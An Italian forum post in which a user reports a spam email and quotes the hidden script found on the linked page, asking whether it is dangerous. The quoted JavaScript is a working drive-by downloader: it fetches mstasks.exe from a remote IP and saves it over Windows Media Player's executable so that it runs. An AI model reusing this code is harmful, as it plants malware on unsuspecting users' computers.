Ho ricevuto oggi una mail (chiaramente uno spam) con il titolo: New Terract in USA!, che diceva di battere un pulsante che avrebbe portato all' indirizzo http:// 69.72.129.89 (ATTENZIONE... navigare su questo indirizzo viene fatto a proprio rischio e pericolo in quanto è presente un "virus". Il link è pubblicato al solo scopo di studio. Topic edited by Piercing) per ulteriori informazioni.
Ingenuamente ho battuto il tasto (tanto, che vuoi che capiti oltre a qualche sito porno!) e non ho trovato che una finestra bianca.
Per curiosità ho controllato il codice che comincia cosi:
- Codice: Seleziona tutto
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://69.72.129.89/mstasks.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<snip>
Come detto non sono un esperto ma mi sembra di capire che se avessi avuto l'ActiveX (e forse se non avessi usato come browser il Netscape) mi sarei trovato con qualche programma indesiderato sul mio HD.
Mi potete dire se questa bestia è pericolosa?
Ciao
Horst
